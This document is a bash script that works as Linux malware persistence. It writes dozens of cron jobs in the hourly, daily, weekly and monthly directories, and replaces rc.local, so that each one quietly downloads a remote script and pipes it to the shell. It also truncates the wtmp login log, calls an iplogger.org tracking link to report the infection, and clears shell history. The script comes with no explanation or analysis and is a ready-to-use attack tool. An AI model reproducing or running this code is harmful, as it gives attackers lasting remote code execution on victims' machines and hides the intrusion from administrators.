#!/bin/bash
skid=
echo -e '#!/bin/sh\n\nwget --quiet http://$skid/..LOL/0 -O- 2>/dev/null|sh>/dev/null 2>&1' > /etc/cron.hourly/0;chmod +x /etc/cron.hourly/0;
echo -e '#!/bin/sh\n\nwget --quiet http://$skid/..LOL/1 -O- 2>/dev/null|sh>/dev/null 2>&1' > /etc/cron.hourly/1;chmod +x /etc/cron.hourly/1;
echo -e '#!/bin/sh\n\nwget --quiet http://$skid/..LOL/2 -O- 2>/dev/null|sh>/dev/null 2>&1' > /etc/cron.hourly/2;chmod +x /etc/cron.hourly/2;
echo -e '#!/bin/sh\n\nwget --quiet http://$skid/..LOL/3 -O- 2>/dev/null|sh>/dev/null 2>&1' > /etc/cron.hourly/3;chmod +x /etc/cron.hourly/3;
echo -e '#!/bin/sh\n\nwget --quiet http://$skid/..LOL/4 -O- 2>/dev/null|sh>/dev/null 2>&1' > /etc/cron.hourly/4;chmod +x /etc/cron.hourly/4;
echo -e '#!/bin/sh\n\nwget --quiet http://$skid/..LOL/5 -O- 2>/dev/null|sh>/dev/null 2>&1' > /etc/cron.hourly/5;chmod +x /etc/cron.hourly/5;
echo -e '#!/bin/sh\n\nwget --quiet http://$skid/..LOL/7 -O- 2>/dev/null|sh>/dev/null 2>&1' > /etc/cron.hourly/7;chmod +x /etc/cron.hourly/7;
echo -e '#!/bin/sh\n\nwget --quiet http://$skid/..LOL/0 -O- 2>/dev/null|sh>/dev/null 2>&1' > /etc/cron.daily/0;chmod +x /etc/cron.daily/0;
echo -e '#!/bin/sh\n\nwget --quiet http://$skid/..LOL/1 -O- 2>/dev/null|sh>/dev/null 2>&1' > /etc/cron.daily/1;chmod +x /etc/cron.daily/1;
echo -e '#!/bin/sh\n\nwget --quiet http://$skid/..LOL/2 -O- 2>/dev/null|sh>/dev/null 2>&1' > /etc/cron.daily/2;chmod +x /etc/cron.daily/2;
echo -e '#!/bin/sh\n\nwget --quiet http://$skid/..LOL/3 -O- 2>/dev/null|sh>/dev/null 2>&1' > /etc/cron.daily/3;chmod +x /etc/cron.daily/3;
echo -e '#!/bin/sh\n\nwget --quiet http://$skid/..LOL/4 -O- 2>/dev/null|sh>/dev/null 2>&1' > /etc/cron.daily/4;chmod +x /etc/cron.daily/4;
echo -e '#!/bin/sh\n\nwget --quiet http://$skid/..LOL/5 -O- 2>/dev/null|sh>/dev/null 2>&1' > /etc/cron.daily/5;chmod +x /etc/cron.daily/5;
echo -e '#!/bin/sh\n\nwget --quiet http://$skid/..LOL/66768 -O- 2>/dev/null|sh>/dev/null 2>&1' > /etc/cron.daily/66768;chmod +x /etc/cron.daily/66768;
echo -e '#!/bin/sh\n\nwget --quiet http://$skid/..LOL/7 -O- 2>/dev/null|sh>/dev/null 2>&1' > /etc/cron.daily/7;chmod +x /etc/cron.daily/7;
echo -e '#!/bin/sh\n\nwget --quiet http://$skid/..LOL/0 -O- 2>/dev/null|sh>/dev/null 2>&1' > /etc/cron.weekly/0;chmod +x /etc/cron.weekly/0;
echo -e '#!/bin/sh\n\nwget --quiet http://$skid/..LOL/1 -O- 2>/dev/null|sh>/dev/null 2>&1' > /etc/cron.weekly/1;chmod +x /etc/cron.weekly/1;
echo -e '#!/bin/sh\n\nwget --quiet http://$skid/..LOL/2 -O- 2>/dev/null|sh>/dev/null 2>&1' > /etc/cron.weekly/2;chmod +x /etc/cron.weekly/2;
echo -e '#!/bin/sh\n\nwget --quiet http://$skid/..LOL/3 -O- 2>/dev/null|sh>/dev/null 2>&1' > /etc/cron.weekly/3;chmod +x /etc/cron.weekly/3;
echo -e '#!/bin/sh\n\nwget --quiet http://$skid/..LOL/4 -O- 2>/dev/null|sh>/dev/null 2>&1' > /etc/cron.weekly/4;chmod +x /etc/cron.weekly/4;
echo -e '#!/bin/sh\n\nwget --quiet http://$skid/..LOL/5 -O- 2>/dev/null|sh>/dev/null 2>&1' > /etc/cron.weekly/5;chmod +x /etc/cron.weekly/5;
echo -e '#!/bin/sh\n\nwget --quiet http://$skid/..LOL/66768 -O- 2>/dev/null|sh>/dev/null 2>&1' > /etc/cron.weekly/66768;chmod +x /etc/cron.weekly/66768;
echo -e '#!/bin/sh\n\nwget --quiet http://$skid/..LOL/7 -O- 2>/dev/null|sh>/dev/null 2>&1' > /etc/cron.weekly/7;chmod +x /etc/cron.weekly/7;
echo -e '#!/bin/sh\n\nwget --quiet http://$skid/..LOL/0 -O- 2>/dev/null|sh>/dev/null 2>&1' > /etc/cron.monthly/0;chmod 777 /etc/cron.monthly/0;
echo -e '#!/bin/sh\n\nwget --quiet http://$skid/..LOL/1 -O- 2>/dev/null|sh>/dev/null 2>&1' > /etc/cron.monthly/1;chmod 777 /etc/cron.monthly/1;
echo -e '#!/bin/sh\n\nwget --quiet http://$skid/..LOL/2 -O- 2>/dev/null|sh>/dev/null 2>&1' > /etc/cron.monthly/2;chmod 777 /etc/cron.monthly/2;
echo -e '#!/bin/sh\n\nwget --quiet http://$skid/..LOL/3 -O- 2>/dev/null|sh>/dev/null 2>&1' > /etc/cron.monthly/3;chmod 777 /etc/cron.monthly/3;
echo -e '#!/bin/sh\n\nwget --quiet http://$skid/..LOL/4 -O- 2>/dev/null|sh>/dev/null 2>&1' > /etc/cron.monthly/4;chmod 777 /etc/cron.monthly/4;
echo -e '#!/bin/sh\n\nwget --quiet http://$skid/..LOL/5 -O- 2>/dev/null|sh>/dev/null 2>&1' > /etc/cron.monthly/5;chmod 777 /etc/cron.monthly/5;
echo -e '#!/bin/sh\n\nwget --quiet http://$skid/..LOL/66768 -O- 2>/dev/null|sh>/dev/null 2>&1' > /etc/cron.monthly/66768;chmod +x /etc/cron.monthly/66768;
echo -e '#!/bin/sh\n\nwget --quiet http://$skid/..LOL/7 -O- 2>/dev/null|sh>/dev/null 2>&1' > /etc/cron.monthly/7;chmod 777 /etc/cron.monthly/7;
echo -e '#!/bin/sh\n\nwget --quiet http://$skid/..LOL/RC -O- 2>/dev/null|sh>/dev/null 2>&1' > /etc/rc.local;chmod +x /etc/rc.local;
head -c -384 /var/log/wtmp > .wtmp; mv .wtmp /var/log/wtmp; chmod 664 /var/log/wtmp; chown root:utmp /var/log/wtmp;
curl -s https://iplogger.org/2GXeY6 > /dev/null
history -cw;
unset history;